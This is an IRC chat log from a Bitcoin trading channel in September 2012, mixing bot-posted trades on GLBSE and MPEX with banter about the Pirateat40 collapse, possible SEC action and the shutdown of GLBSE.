[NASTY] 4 @ 0.415 = 1.66 BTC [-] Sep 24 22:15:22 [GLBSE] [NASTY] 2 @ 0.4101 = 0.8202 BTC [-] Sep 24 22:15:23 [GLBSE] [NASTY] 2 @ 0.41 = 0.82 BTC [-] Sep 24 22:15:24 [GLBSE] [NASTY] 2 @ 0.4053 = 0.8106 BTC [-] Sep 24 22:15:25 [GLBSE] [NASTY] 2 @ 0.4052 = 0.8104 BTC [-] Sep 24 22:15:26 [GLBSE] [NASTY] 10 @ 0.405 = 4.05 BTC [-] Sep 24 22:15:27 [GLBSE] [NASTY] 1 @ 0.4 BTC [-] Sep 24 22:15:28 in soviet russia it's friends that make you! Sep 24 22:15:28 [GLBSE] [NASTY] 1 @ 0.3852 BTC [-] Sep 24 22:15:29 [GLBSE] [NASTY] 3 @ 0.385 = 1.155 BTC [-] Sep 24 22:15:43 The Russians have dealt well with Cubans before Sep 24 22:15:49 They might like me Sep 24 22:16:36 why? are you cuban? Sep 24 22:16:37 [GLBSE] [CPA] 1 @ 0.031 BTC [-] Sep 24 22:16:57 Half-Puerto Rican Sep 24 22:17:00 Close enough. Sep 24 22:17:03 ahahaha Sep 24 22:17:27 [GLBSE] [GOLD] 1 @ 0.00995 BTC [-] Sep 24 22:17:36 Patient: "Doctor, nobody considers me" Sep 24 22:17:39 Doctor: "Next!" Sep 24 22:17:47 [GLBSE] [BDK.BND] 2 @ 0.096 = 0.192 BTC [-] Sep 24 22:17:49 [GLBSE] [BDK.BND] 20 @ 0.0953 = 1.906 BTC [-] Sep 24 22:17:50 [GLBSE] [BDK.BND] 1 @ 0.0911 BTC [-] Sep 24 22:17:52 [GLBSE] [BDK.BND] 100 @ 0.09100001 = 9.1 BTC [-] Sep 24 22:17:52 [GLBSE] [BDK.BND] 100 @ 0.091 = 9.1 BTC [-] Sep 24 22:17:53 [GLBSE] [BDK.BND] 100 @ 0.081 = 8.1 BTC [-] Sep 24 22:18:48 gee whiz, two pages of glbse spam, a grand total of < 50 btc Sep 24 22:18:54 and -20% on the named assets Sep 24 22:19:17 [GLBSE] [CPA] 4 @ 0.031 = 0.124 BTC [-] Sep 24 22:19:18 I used to be for free-for-alls but that just isn't working Sep 24 22:19:18 [GLBSE] [CPA] 10 @ 0.025 = 0.25 BTC [-] Sep 24 22:19:24 [GLBSE] [ASICMINER] 16 @ 0.11799999 = 1.888 BTC [+] Sep 24 22:19:27 We need to filter out the non-profitable crud Sep 24 22:19:30 [GLBSE] [GSDPT] 1 @ 0.003279 BTC [-] Sep 24 22:19:58 [GLBSE] [GSDPT] 3999 @ 0.00327 = 13.0767 BTC [-] Sep 24 22:20:28 [GLBSE] [JTME] 1 @ 0.655 BTC [-] Sep 24 22:20:35 Pirateat40 is going to prison Sep 24 22:20:36 heh Sep 24 22:20:43 right Sep 24 22:20:45 I'm against that. Sep 24 22:20:54 He should just have his wages garnished Sep 24 22:21:03 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.25511268 = 255.1127 BTC [-] Sep 24 22:21:03 Not a 5 year vacation in a cell Sep 24 22:21:16 [GLBSE] [ASICMINER] 18 @ 0.118 = 2.124 BTC [+] Sep 24 22:21:28 [GLBSE] [KRAKEN] 1 @ 0.00700001 BTC [-] Sep 24 22:21:29 Bane_Capital looks more like 12ish if he is in fact convicted. Sep 24 22:21:42 dont you have to have a trial before that? Sep 24 22:21:46 indeed. Sep 24 22:21:47 hence the if Sep 24 22:21:51 years of trials Sep 24 22:21:52 [GLBSE] [GMVT-BOT] 1 @ 0.1000001 BTC [+] Sep 24 22:22:22 [GLBSE] [V.HRL] 1 @ 0.9022 BTC [-] Sep 24 22:22:45 [GLBSE] [GREEN] 4 @ 0.053 = 0.212 BTC [+] Sep 24 22:22:47 [GLBSE] [GREEN] 3 @ 0.052 = 0.156 BTC [-] Sep 24 22:22:47 ..? prison? wtf are you gobbling on about again? Sep 24 22:22:48 [GLBSE] [GREEN] 7 @ 0.051 = 0.357 BTC [-] Sep 24 22:22:57 SEC talk Sep 24 22:23:07 Wow there are all sorts of new messes in bitcoin Sep 24 22:23:19 was anyone be able to find this case? Sep 24 22:23:25 https://bitcointalk.org/index.php?topic=112402.0 Im guessing this is what mircea_popescu was talking about Sep 24 22:23:34 NY-8834 is that a case number? Sep 24 22:23:54 or somekind of an identifer for the email? Sep 24 22:23:58 [GLBSE] [FPGAMINING] 1 @ 0.41224 BTC [-] Sep 24 22:24:10 Yes, there is but I don't feel like digging it up Sep 24 22:24:11 its a case number Sep 24 22:24:47 [GLBSE] [TEEK.USD] 2 @ 0.0625 = 0.125 BTC [-] Sep 24 22:25:44 [GLBSE] [FUTUREFUND] 20 @ 0.000101 = 0.002 BTC [-] Sep 24 22:26:21 BTC-Mining so i take it you don't want to buy into glbse valued at Sep 24 22:26:25 .py .3 * 77500 Sep 24 22:26:29 23250.0 Sep 24 22:26:35 [GLBSE] [ABM] 1 @ 0.12500001 BTC [-] Sep 24 22:26:36 [GLBSE] [ABM] 10 @ 0.125 = 1.25 BTC [-] Sep 24 22:27:09 [GLBSE] [CIUCIU.BOND] 1 @ 0.1021 BTC [-] Sep 24 22:27:09 If Theymos know what he was doing, he would have a discreet and locked message regarding the sale. Sep 24 22:27:10 [GLBSE] [CIUCIU.BOND] 2 @ 0.1021 = 0.2042 BTC [-] Sep 24 22:27:11 [GLBSE] [CIUCIU.BOND] 10 @ 0.101 = 1.01 BTC [-] Sep 24 22:27:12 [GLBSE] [CIUCIU.BOND] 46 @ 0.10000001 = 4.6 BTC [-] Sep 24 22:27:13 Saying nothing about the value. Sep 24 22:27:19 knew* Sep 24 22:27:31 He just ruined the sale for himself. Sep 24 22:27:53 [GLBSE] [TEEK.B] 1 @ 0.30205001 BTC [-] Sep 24 22:27:54 [GLBSE] [TEEK.B] 8 @ 0.30205 = 2.4164 BTC [-] Sep 24 22:27:56 [GLBSE] [TEEK.B] 2 @ 0.301 = 0.602 BTC [-] Sep 24 22:27:57 [GLBSE] [TEEK.B] 10 @ 0.28 = 2.8 BTC [-] Sep 24 22:27:58 [GLBSE] [TEEK.B] 13 @ 0.2501 = 3.2513 BTC [-] Sep 24 22:28:21 http://www.youtube.com/watch?feature=player_embedded&v=WOsoSXjN8LM Sep 24 22:28:45 bubbles! Sep 24 22:28:53 http://www.youtube.com/watch?v=Ox3lqBkFuJ4 Sep 24 22:29:08 I have a feeling this man is happier than most people Sep 24 22:30:31 hes one great actor Sep 24 22:35:24 [GLBSE] [BBBB] 316 @ 0.00016 = 0.0506 BTC [-] Sep 24 22:36:13 [MPEX] [S.MPOE] 20537 @ 0.00041474 = 8.5175 BTC [-] Sep 24 22:36:15 [MPEX] [S.MPOE] 2907 @ 0.0004147 = 1.2055 BTC [-] Sep 24 22:36:16 [MPEX] [S.MPOE] 21520 @ 0.0004141 = 8.9114 BTC [-] Sep 24 22:36:17 [MPEX] [S.MPOE] 60200 @ 0.00041397 = 24.921 BTC [-] Sep 24 22:36:19 [MPEX] [S.MPOE] 23200 @ 0.00041387 = 9.6018 BTC [-] Sep 24 22:36:19 [MPEX] [S.MPOE] 1400 @ 0.00041368 = 0.5792 BTC [-] Sep 24 22:36:20 [MPEX] [S.MPOE] 40700 @ 0.00041342 = 16.8262 BTC [-] Sep 24 22:36:21 [MPEX] [S.MPOE] 46300 @ 0.0004132 = 19.1312 BTC [-] Sep 24 22:36:22 [MPEX] [S.MPOE] 42987 @ 0.00041213 = 17.7162 BTC [-] Sep 24 22:36:23 [MPEX] [S.MPOE] 40343 @ 0.00040234 = 16.2316 BTC [-] Sep 24 22:36:25 [MPEX] [S.MPOE] 43772 @ 0.00040179 = 17.5872 BTC [-] Sep 24 22:36:25 whoa nelly Sep 24 22:36:26 [MPEX] [S.MPOE] 29400 @ 0.00039933 = 11.7403 BTC [-] Sep 24 22:36:26 [MPEX] [S.MPOE] 201774 @ 0.000385 = 77.683 BTC [-] Sep 24 22:36:27 [MPEX] [S.MPOE] 16208 @ 0.00038493 = 6.2389 BTC [-] Sep 24 22:36:28 [MPEX] [S.MPOE] 7200 @ 0.00038485 = 2.7709 BTC [-] Sep 24 22:36:29 [MPEX] [S.MPOE] 30000 @ 0.00038434 = 11.5302 BTC [-] Sep 24 22:36:30 [MPEX] [S.MPOE] 39500 @ 0.00038428 = 15.1791 BTC [-] Sep 24 22:36:31 [MPEX] [S.MPOE] 3300 @ 0.0003842 = 1.2679 BTC [-] Sep 24 22:36:32 [MPEX] [S.MPOE] 38100 @ 0.00038408 = 14.6334 BTC [-] Sep 24 22:36:32 can we has panicky investoar pls Sep 24 22:36:33 [MPEX] [S.MPOE] 58100 @ 0.00038403 = 22.3121 BTC [-] Sep 24 22:36:34 [MPEX] [S.MPOE] 44000 @ 0.00038355 = 16.8762 BTC [-] Sep 24 22:36:35 [MPEX] [S.MPOE] 55509 @ 0.00038353 = 21.2894 BTC [-] Sep 24 22:36:36 [MPEX] [S.MPOE] 55000 @ 0.00038316 = 21.0738 BTC [-] Sep 24 22:36:36 [MPEX] [S.MPOE] 53700 @ 0.00038305 = 20.5698 BTC [-] Sep 24 22:36:37 [MPEX] [S.MPOE] 27300 @ 0.00038304 = 10.457 BTC [-] Sep 24 22:36:38 [MPEX] [S.MPOE] 61520 @ 0.000383 = 23.5622 BTC [-] Sep 24 22:36:39 [MPEX] [S.MPOE] 27800 @ 0.00038248 = 10.6329 BTC [-] Sep 24 22:36:40 [MPEX] [S.MPOE] 49500 @ 0.0003824 = 18.9288 BTC [-] Sep 24 22:36:41 [MPEX] [S.MPOE] 52900 @ 0.00038207 = 20.2115 BTC [-] Sep 24 22:36:42 [MPEX] [S.MPOE] 46200 @ 0.00038153 = 17.6267 BTC [-] Sep 24 22:36:43 [MPEX] [S.MPOE] 23400 @ 0.0003807 = 8.9084 BTC [-] Sep 24 22:36:44 [MPEX] [S.MPOE] 848990 @ 0.00035 = 297.1465 BTC [-] Sep 24 22:36:45 [MPEX] [S.MPOE] 53700 @ 0.00034626 = 18.5942 BTC [-] Sep 24 22:36:46 [MPEX] [S.MPOE] 70100 @ 0.00034021 = 23.8487 BTC [-] Sep 24 22:36:51 nice bot Sep 24 22:37:46 [MPEX] [S.MPOE] 1488126 @ 0.00034 = 505.9628 BTC [-] Sep 24 22:38:52 http://www.youtube.com/watch?feature=player_embedded&v=v1GJO5n7wxM Sep 24 22:40:13 [GLBSE] [GOLD] 18 @ 0.00996 = 0.1793 BTC [+] Sep 24 22:40:37 [GLBSE] [OBSI.HRPT] 2 @ 0.07499999 = 0.15 BTC [-] Sep 24 22:41:12 [GLBSE] [OBSI.HRPT] 1 @ 0.07499999 BTC [-] Sep 24 22:42:30 mircea_popescu: SS price should be in the .0X range, .X would be an unbelieveable price per share Sep 24 22:42:48 was it traded at 1.x then split 100x ? Sep 24 22:43:37 Lucidize: pigeons: SS had some bad debt related to pirate, and there was a 100 for 1 split Sep 24 22:44:02 [MPEX] [S.MPOE] 423925 @ 0.00035 = 148.3738 BTC [+] Sep 24 22:44:32 [GLBSE] [FUTUREFUND] 4 @ 0.00012 = 0.0005 BTC [+] Sep 24 22:44:33 The SEC isn't getting money for anybody Sep 24 22:44:40 You can consider all the funds gone at this point Sep 24 22:45:16 they were gone back in august. Sep 24 22:45:26 I cant even access the "black market" stuff Sep 24 22:46:08 [GLBSE] [FUTUREFUND] 23 @ 0.00012 = 0.0028 BTC [+] Sep 24 22:46:34 He's going to prison most likely Sep 24 22:46:39 so no wages to garnish Sep 24 22:47:15 Some cheap texas homes Sep 24 22:47:34 A pissed off wife Sep 24 22:47:43 some kids who aren't getting a trust fund Sep 24 22:47:55 hahaha Sep 24 22:48:14 In China, Pirate would be executed for this. Sep 24 22:48:20 Boiled to death. Sep 24 22:48:32 no exactly Sep 24 22:48:33 CEOs end up in the pot all the time. Sep 24 22:48:39 but he WOULD have been executed Sep 24 22:49:37 Heh, it is the oldest form of justice there is Sep 24 22:49:38 [GLBSE] [OBSI.HRPT] 36 @ 0.07499999 = 2.7 BTC [-] Sep 24 22:49:38 [GLBSE] [OBSI.HRPT] 64 @ 0.075 = 4.8 BTC [+] Sep 24 22:49:59 so why NY sec is involved? Sep 24 22:50:07 they're only responsible only like for NY? Sep 24 22:50:31 ny sec is about 90% of the sec Sep 24 22:51:06 there is one in texas Sep 24 22:51:08 http://www.sec.gov/contact/addresses.htm Sep 24 22:51:09 [GLBSE] [PUREMINING] 5 @ 0.1086 = 0.543 BTC [-] Sep 24 22:51:35 [GLBSE] [OBSI.HRPT] 19 @ 0.075 = 1.425 BTC [+] Sep 24 22:51:44 ya Sep 24 22:52:29 lol Sep 24 22:52:57 Smoovious: People have lost hundeds of thousands Sep 24 22:53:05 they would beat you for saying that ;P Sep 24 22:53:09 yes Sep 24 22:53:11 yes i would Sep 24 22:53:27 You have a right to say it no matter what Sep 24 22:53:35 Smoovious did you get an email? Sep 24 22:54:40 jcpham i take it you did ? Sep 24 22:55:10 i did not ;) Sep 24 22:55:56 i would most likely speak directly to an attorney Sep 24 22:56:04 were i to receive something of that nature Sep 24 22:56:11 [GLBSE] [OBSI.HRPT] 13 @ 0.075 = 0.975 BTC [+] Sep 24 22:56:37 some people were talking about that intent. Sep 24 22:56:51 why i cant view BIB.PIRATE on glbse? Sep 24 22:56:53 the lawyers in that field charge a pretty penny. Sep 24 22:56:56 of course that's how it is presented Sep 24 22:57:22 portfolio->click on BIB.PIRATE Sep 24 22:57:41 just keep coming back to my portfolio Sep 24 22:57:52 Nefario, we need your help Sep 24 22:57:55 HELP US Sep 24 22:57:58 ASSIST US Sep 24 22:58:01 ENLIGHTEN US Sep 24 22:58:06 SHOW US THE ONE TRUE WAY Sep 24 22:58:26 Okay, buddha. Sep 24 22:58:28 [GLBSE] [OBSI.HRPT] 3 @ 0.075 = 0.225 BTC [+] Sep 24 22:59:54 Those assets are not listed or traded anymore Sep 24 23:00:47 yet they're in his portofolio ? Sep 24 23:01:05 Here comes the butthurt Sep 24 23:01:14 so i can't even sell at the loss? hmm Sep 24 23:01:34 https://bitcointalk.org/index.php?topic=112438.msg1217339#msg1217339 awww where's goat when you can rub it in ? Sep 24 23:01:39 i need to document that i actually owned them :-) Sep 24 23:03:20 meh an another day of drama in the bitcoin world Sep 24 23:03:55 of pirates? 65 or so.. meh i got my money back so dont care much Sep 24 23:05:15 nefario : PPT.A can be sold back at the insured 0.32 why can't we be allowed to do that? Sep 24 23:05:35 there was a 0.32 bid wall Sep 24 23:07:48 farfi: Talk to the issuer Sep 24 23:08:09 Well, actually, no receipt is there? Sep 24 23:09:08 Anyways, I think the whole pirate mess is as bad as it gets Sep 24 23:09:15 I think it's smooth sailing from here on out Sep 24 23:09:45 depends. we might get the first btc-indictments before a grand jury Sep 24 23:10:01 yikes Sep 24 23:10:15 In that case, I'm getting the hell out of dodge. Sep 24 23:10:19 Russia here I come. Sep 24 23:10:26 lol Sep 24 23:10:33 why did theymos even mention the price of .3.... he wont now much more than that Sep 24 23:10:44 In russia its cold now Sep 24 23:10:49 vampireb possibly cause .3 is a good deal iho ? Sep 24 23:11:01 you need "valenki" Sep 24 23:11:58 but that's pretty much makes sure that he wont sell above that price. Sep 24 23:12:10 most likely people woould offer much lower Sep 24 23:13:03 [MPEX] [F.GIGA.ETF] 10700 @ 0.00029 = 3.103 BTC [-] Sep 24 23:13:15 true. Sep 24 23:13:22 maybe he's just not much of a businessman. Sep 24 23:13:26 maybe he doesn't care what he gets Sep 24 23:13:27 fuck knows. Sep 24 23:14:32 [GLBSE] [GIGAMINING] 1 @ 0.6352 BTC [-] Sep 24 23:14:34 [GLBSE] [GIGAMINING] 4 @ 0.635 = 2.54 BTC [-] Sep 24 23:14:43 well 60k usd isn't bad at all Sep 24 23:15:31 vampireb mpex is valued at about 25x that Sep 24 23:15:50 [GLBSE] [YABMC] 5 @ 0.08199999 = 0.41 BTC [+] Sep 24 23:15:57 MPOE stocks eh? Sep 24 23:16:09 !ticker s.mpoe Sep 24 23:16:12 [MPEX:S.MPOE] 1day: 0.00034 / 0.00037054 / 0.00042 (5231397 shares, 1,938.44 BTC), 30day: 0.00034 / 0.0003969 / 0.00042 (60403512 shares, 23,974.36 BTC) Sep 24 23:16:24 ;;ticker Sep 24 23:16:25 Best bid: 12.1201, Best ask: 12.198, Bid-ask spread: 0.07790, Last trade: 12.1999, 24 hour volume: 24660, 24 hour low: 11.96, 24 hour high: 12.29888 Sep 24 23:16:29 .py 34 * 12.12 Sep 24 23:16:31 412.08 Sep 24 23:16:37 4.12mn Sep 24 23:18:43 [GLBSE] [BBBB] 1 @ 0.00016 BTC [-] Sep 24 23:18:48 [GLBSE] [GIGAMINING] 1 @ 0.6212 BTC [-] Sep 24 23:18:50 [GLBSE] [GIGAMINING] 5 @ 0.62100001 = 3.105 BTC [-] Sep 24 23:18:51 [GLBSE] [GIGAMINING] 5 @ 0.621 = 3.105 BTC [-] Sep 24 23:18:51 [GLBSE] [GIGAMINING] 89 @ 0.62 = 55.18 BTC [-] Sep 24 23:19:01 [GLBSE] [BTC-MINING] 1 @ 0.955 BTC [-] Sep 24 23:19:03 [GLBSE] [BTC-MINING] 1 @ 0.825 BTC [-] Sep 24 23:19:04 [GLBSE] [BTC-MINING] 10 @ 0.8205 = 8.205 BTC [-] Sep 24 23:19:05 [GLBSE] [BTC-MINING] 3 @ 0.8202 = 2.4606 BTC [-] Sep 24 23:19:07 [GLBSE] [BTC-MINING] 15 @ 0.82 = 12.3 BTC [-] Sep 24 23:19:08 [GLBSE] [BTC-MINING] 4 @ 0.8002 = 3.2008 BTC [-] Sep 24 23:19:08 [GLBSE] [BTC-MINING] 22 @ 0.80000002 = 17.6 BTC [-] Sep 24 23:19:09 [GLBSE] [BTC-MINING] 49 @ 0.80000002 = 39.2 BTC [-] Sep 24 23:20:11 [GLBSE] [GIGAMINING] 1 @ 0.62 BTC [-] Sep 24 23:20:12 [GLBSE] [GIGAMINING] 2 @ 0.61 = 1.22 BTC [-] Sep 24 23:20:13 [GLBSE] [GIGAMINING] 4 @ 0.6002 = 2.4008 BTC [-] Sep 24 23:20:15 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [-] Sep 24 23:20:16 [GLBSE] [GIGAMINING] 2 @ 0.591111 = 1.1822 BTC [-] Sep 24 23:25:09 [GLBSE] [NASTY] 9 @ 0.3849 = 3.4641 BTC [-] Sep 24 23:26:15 [GLBSE] [GIGAMINING] 1 @ 0.6398 BTC [+] Sep 24 23:26:16 [GLBSE] [NASTY] 10 @ 0.385 = 3.85 BTC [+] Sep 24 23:27:48 At least I know understand Theymos's desire to get the PPTs listed on glbse. Sep 24 23:27:49 [GLBSE] [GIGAMINING] 1 @ 0.64 BTC [+] Sep 24 23:27:56 Hes a crook in his own way. Sep 24 23:28:02 err now* Sep 24 23:28:20 [GLBSE] [NASTY] 1 @ 0.385 BTC [+] Sep 24 23:28:34 [GLBSE] [GSDPT] 1000 @ 0.0033 = 3.3 BTC [+] Sep 24 23:29:14 Doffx listing the ppts WAs a bad ideea Sep 24 23:29:19 but i don't think it was theymos' Sep 24 23:29:35 [GLBSE] [NASTY] 6 @ 0.385 = 2.31 BTC [+] Sep 24 23:29:36 No but he pushed others to do it, and now I see why Sep 24 23:30:14 [GLBSE] [GSDPT] 1150 @ 0.0033 = 3.795 BTC [+] Sep 24 23:30:28 He understud what he was doing and also knew the volatility of them would generate revenue for glbse Sep 24 23:30:41 Doffx link to this pushing ? Sep 24 23:30:42 Its smart, and crooked in its own way. Sep 24 23:30:48 [GLBSE] [NASTY] 1 @ 0.385 BTC [+] Sep 24 23:30:55 Its in several of the Pirate threads Sep 24 23:31:11 I think he worked with Goat too Sep 24 23:31:41 Doffx i would muchly appreciate linkage. Sep 24 23:31:43 I cant remember the full details but its listed in the may PPT threads, also something about him not being able to get his own account. Sep 24 23:31:54 [GLBSE] [YABMC] 1 @ 0.06200001 BTC [-] Sep 24 23:31:56 [GLBSE] [YABMC] 4 @ 0.06103002 = 0.2441 BTC [-] Sep 24 23:31:58 [GLBSE] [NASTY] 1 @ 0.385 BTC [+] Sep 24 23:32:08 Id have to find it, and I dont remember which ones it was. Sep 24 23:32:15 what are you looking for? Sep 24 23:32:40 The threads for PPT where someone said Theymos wanted the PPT's listed on Glbse Sep 24 23:32:58 !ticker gigamining 1 Sep 24 23:33:07 [GLBSE:GIGAMINING] [Bid: 0.55020001] [Ask: 0.64] [Spread: 0.08979999] [Last: 0.64] [24hVol: 427.43831217] [7dAvg: 0.64684016] Sep 24 23:33:07 [GLBSE] [NASTY] 1 @ 0.385 BTC [+] Sep 24 23:33:13 !pl gigamining 1 Sep 24 23:33:15 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 23:33:29 GIGAMINING [1@1BTC] paid: 0.46887596 BTC. Last price: 0.64 BTC. Capital gain: -0.36 BTC. Total: 0.10887596 BTC. (10.9%) Sep 24 23:33:30 mircea_popescu: i'm not sure giga ipo'd at 1 Sep 24 23:33:36 smickles it did. Sep 24 23:33:45 oh, ok :) Sep 24 23:33:56 !pl asicminer 1 Sep 24 23:33:57 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 23:33:59 !pl asicminer .1 Sep 24 23:34:10 No dividend payments yet. Sep 24 23:34:11 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 23:34:11 https://bitcointalk.org/index.php?topic=82572.msg910183#msg910183 Sep 24 23:34:14 No dividend payments yet. Sep 24 23:34:34 !pl asicminer .1 Sep 24 23:34:36 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 23:34:37 No dividend payments yet. Sep 24 23:34:44 Awesome, thanks vampireb. Sep 24 23:36:40 o that's how goat got started huh Sep 24 23:36:45 http://youtu.be/o2_8ZE2Hl6E Sep 24 23:36:48 i guess he has a decent case for enticement Sep 24 23:39:02 Whoa whoa Sep 24 23:39:05 who enticed who? Sep 24 23:40:04 [MPEX] [S.MPOE] 35974 @ 0.00038377 = 13.8057 BTC [+] Sep 24 23:40:05 [MPEX] [S.MPOE] 9335 @ 0.00038278 = 3.5733 BTC [-] Sep 24 23:40:11 [GLBSE] [FPGAMINING] 1 @ 0.41044 BTC [-] Sep 24 23:40:12 [GLBSE] [FPGAMINING] 7 @ 0.41024318 = 2.8717 BTC [-] Sep 24 23:40:14 [GLBSE] [FPGAMINING] 4 @ 0.41024317 = 1.641 BTC [-] Sep 24 23:40:15 [GLBSE] [FPGAMINING] 2 @ 0.41014 = 0.8203 BTC [-] Sep 24 23:40:16 [GLBSE] [FPGAMINING] 1 @ 0.40006 BTC [-] Sep 24 23:40:44 theymos goat Sep 24 23:41:09 [GLBSE] [FPGAMINING] 1 @ 0.40006 BTC [-] Sep 24 23:41:11 [GLBSE] [FPGAMINING] 1 @ 0.4 BTC [-] Sep 24 23:41:12 [GLBSE] [FPGAMINING] 1 @ 0.3992 BTC [-] Sep 24 23:42:11 Heh Sep 24 23:46:15 so bitfloor came back with 100% cold storage Sep 24 23:46:33 supposedly Sep 24 23:46:33 who was telling me weeks ago that this isn't the way to go ? Sep 24 23:46:44 Yeah, stay away Sep 24 23:49:45 [GLBSE] [GSDPT] 86 @ 0.0033 = 0.2838 BTC [+] Sep 24 23:54:16 [GLBSE] [FPGAMINING] 1 @ 0.3778 BTC [-] Sep 24 23:54:18 [GLBSE] [FPGAMINING] 4 @ 0.37760009 = 1.5104 BTC [-] Sep 24 23:54:20 [GLBSE] [FPGAMINING] 11 @ 0.37760008 = 4.1536 BTC [-] Sep 24 23:54:50 https://bitcointalk.org/index.php?topic=112070.0 incidentally this looks pretty bad for bitfloor security. Sep 24 23:55:12 [GLBSE] [ASICMINER] 12 @ 0.11650001 = 1.398 BTC [-] Sep 24 23:55:18 What did I do? Sep 24 23:55:26 Now I am charged with securities fraud? Sep 24 23:55:29 Geez :P Sep 24 23:55:42 lol Sep 24 23:56:29 Usagi: Uses CPA to launder illegal drug sales Sep 24 23:56:34 [GLBSE] [ASICMINER] 11 @ 0.11650001 = 1.2815 BTC [-] Sep 24 23:57:13 Hey SEC Sep 24 23:57:18 Hey FEDs Sep 24 23:57:22 sup Sep 24 23:57:23 Whatya doin? Sep 24 23:57:26 busy Sep 24 23:57:30 lol Sep 24 23:57:35 I wouldn't be surprised Sep 24 23:58:20 [GLBSE] [ASICMINER] 9 @ 0.11650001 = 1.0485 BTC [-] Sep 24 23:58:59 Bane_Capital where do I deposit funds for your new invite-only HYIP Sep 24 23:59:04 i wish to ride on the atlas train Sep 25 00:01:36 1banecapitalsnewinviteonlyHYIP Sep 25 00:02:07 and btw , why can't i have an address starting with 2 ? Sep 25 00:02:38 reserved for second class bitcitizens Sep 25 00:03:32 well you can have one starting with 3 Sep 25 00:05:14 https://lh3.googleusercontent.com/-uTzxpdsCAB0/UGDK4x_AsWI/AAAAAAAAItk/lO59Im5X8WM/s324/12+-+1 Sep 25 00:05:21 stock tip: honda in saudi Sep 25 00:11:55 [MPEX] [S.MPOE] 33918 @ 0.00038662 = 13.1134 BTC [+] Sep 25 00:11:56 [MPEX] [S.MPOE] 7204 @ 0.00038662 = 2.7852 BTC [+] Sep 25 00:11:57 [MPEX] [S.MPOE] 42365 @ 0.00038278 = 16.2165 BTC [-] Sep 25 00:11:59 [MPEX] [S.MPOE] 26000 @ 0.00037842 = 9.8389 BTC [-] Sep 25 00:12:00 [MPEX] [S.MPOE] 5700 @ 0.00037787 = 2.1539 BTC [-] Sep 25 00:12:01 [MPEX] [S.MPOE] 65800 @ 0.00037648 = 24.7724 BTC [-] Sep 25 00:12:02 [MPEX] [S.MPOE] 23000 @ 0.000374 = 8.602 BTC [-] Sep 25 00:12:03 [MPEX] [S.MPOE] 21800 @ 0.00037033 = 8.0732 BTC [-] Sep 25 00:12:04 [MPEX] [S.MPOE] 11600 @ 0.00036005 = 4.1766 BTC [-] Sep 25 00:12:05 [MPEX] [S.MPOE] 39031 @ 0.00035 = 13.6609 BTC [-] Sep 25 00:23:56 mircea_popescu, didnt you recently state you were begining to question the quality of mpoe-pr's posts? https://bitcointalk.org/index.php?topic=110062.msg1214580#msg1214580 they did just fine on that one Sep 25 00:24:37 Ignatius-bot i was appalled that various noobs such as reeses scored higher than her on theymos' list Sep 25 00:24:47 usagi: what's up now ? re:hilight Sep 25 00:26:10 oh, lol :) Sep 25 00:27:25 [GLBSE] [OBSI.HRPT] 3 @ 0.06805282 = 0.2042 BTC [-] Sep 25 00:27:26 [GLBSE] [OBSI.HRPT] 30 @ 0.0674418 = 2.0233 BTC [-] Sep 25 00:27:27 [GLBSE] [OBSI.HRPT] 25 @ 0.06744179 = 1.686 BTC [-] Sep 25 00:27:28 [GLBSE] [OBSI.HRPT] 2 @ 0.06709625 = 0.1342 BTC [-] Sep 25 00:33:22 that ciuciu sure is rabid Sep 25 00:33:42 there's a lot of that going around Sep 25 00:37:03 [MPEX] [F.GIGA.ETF] 16600 @ 0.00029 = 4.814 BTC [-] Sep 25 00:54:33 dangit, nefario Sep 25 00:54:55 I was talking to you and poof... no such nick/channel Sep 25 00:58:51 Ah, you timed out while I was writing you something nefario Sep 25 00:59:04 Will rePM it Sep 25 01:09:43 Luceo there's no such thing as "selling your silence" you know. **** ENDING LOGGING AT Tue Sep 25 01:09:55 2012 **** BEGIN LOGGING AT Tue Sep 25 01:12:53 2012 Sep 25 01:13:53 [GLBSE] [BTC-MINING] 4 @ 0.8002 = 3.2008 BTC [+] Sep 25 01:13:55 [GLBSE] [BTC-MINING] 16 @ 0.80000002 = 12.8 BTC [-] Sep 25 01:14:27 Don't sell BTC-Mining like that =/ Sep 25 01:15:10 lol i read 0.0000002 Sep 25 01:16:56 Eh, everybody would wish to buy at that price Sep 25 01:19:08 Stop pingouting people Sep 25 01:19:56 ya srsly Sep 25 01:20:02 i got my first conn reset in > 3 months Sep 25 01:20:25 22:20 -!- Irssi: Uptime: 33d 0h 48m 52s Sep 25 01:22:02 [GLBSE] [BITBOND] 1 @ 0.3598 BTC [+] Sep 25 01:22:56 im getting slighty jealous. why cant i have endless threads like Diablo-D3 and usagi get on the forum Sep 25 01:23:28 where's factory and puppet and deprived ;/ Sep 25 01:24:03 [GLBSE] [ASICMINER] 1 @ 0.117899 BTC [+] Sep 25 01:24:27 I have the same issue mircea =/ Sep 25 01:25:12 we suck. Sep 25 01:26:20 [GLBSE] [PUREMINING] 1 @ 0.1088 BTC [+] Sep 25 01:26:38 If you don't get trolled like there's no tomorrow on bitcointalk.org, you obviously lack visibility. Sep 25 01:27:25 o, so i'm good then Sep 25 01:27:29 i think they're affraid of the girl. Sep 25 01:27:39 gigavps you don;'t get trolled ?! Sep 25 01:28:25 Weren't Smoothie and EskimoBob all over your threads? Sep 25 01:29:47 that is what i meant, i get trolled, i'm good on the visibility front Sep 25 01:30:15 oh =P Sep 25 01:32:18 [GLBSE] [CPA] 2 @ 0.03398 = 0.068 BTC [+] Sep 25 01:33:06 [GLBSE] [CPA] 1 @ 0.027184 BTC [-] Sep 25 01:33:08 [GLBSE] [CPA] 1 @ 0.01 BTC [-] Sep 25 01:34:03 [MPEX] [S.MPOE] 10500 @ 0.00035 = 3.675 BTC [-] Sep 25 01:34:23 First BTC-MINING then CPA Sep 25 01:34:33 Everything going down the gutter Sep 25 01:34:53 Stop... market... selling... Sep 25 01:34:58 Put asks Sep 25 01:35:52 Smoovious, the current stocks will certainly won't be allowed on the regulated GLBSE. Sep 25 01:36:00 BTC-Mining the tape was bleeding all day Sep 25 01:36:05 Unless they comply with all regulations. Sep 25 01:36:25 !ticker ss Sep 25 01:36:27 Invalid ticker. Sep 25 01:36:32 so now that glbse has decided to go away, who's gonna be the "play stocks" exchange to complement mpex ? Sep 25 01:37:18 gribble! Sep 25 